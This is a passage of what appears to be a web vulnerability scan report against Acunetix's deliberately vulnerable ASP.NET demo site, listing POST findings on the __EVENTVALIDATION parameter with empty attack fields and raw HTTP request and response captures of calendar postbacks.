title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8197&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgAA9VM9S9oIZGRkomtQ6tii7W0i7e3Kz%2BoqwFWfsa0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK0teekDgK646%2FsDgKcisLvAQK%2Fk6foDAK%2Fk6foDAK%2Fk9uMBAK%2Fk9uMBAK%2Fk8%2BjDQK%2Fk8%2BjDQK%2Fk%2BPGBgK%2Fk%2BPGBgK%2Fk9evAwK%2Fk9evAwK%2Fk8vCDAK%2Fk8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6%2FSUCkLqR%2BAkCkLqR%2BAkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ%2FJwKAtfZ%2FJwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w%2Be3t9bY6RruB%2F2jm8bJ9AB2rJ0bA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:15:16 GMT Content-Length: 12444
Response Body - size: 12,444 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgAA9VM9S9oIZGRkomtQ6tii7W0i7e3Kz+oqwFWfsa0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK0teekDgK646/sDgKcisLvAQK/k6foDAK/k6foDAK/k9uMBAK/k9uMBAK/k8+jDQK/k8+jDQK/k+PGBgK/k+PGBgK/k9evAwK/k9evAwK/k8vCDAK/k8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6/SUCkLqR+AkCkLqR+AkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ/JwKAtfZ/JwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w+e3t9bY6RruB/2jm8bJ9AB2rJ0bA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:White" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1067 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,067 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8384&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAEA0Ty%2Fe2ghkZGRigAgEg73LI32BugNu9A6E195Sjg%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK0uYSXDQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBAFvYDsrj%2B5oA%2F047S3S3a1m%2FWwm
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:30:34 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAEA0Ty/e2ghkZGRigAgEg73LI32BugNu9A6E195Sjg==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK0uYSXDQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBAFvYDsrj+5oA/047S3S3a1m/Wwm" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:White" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" 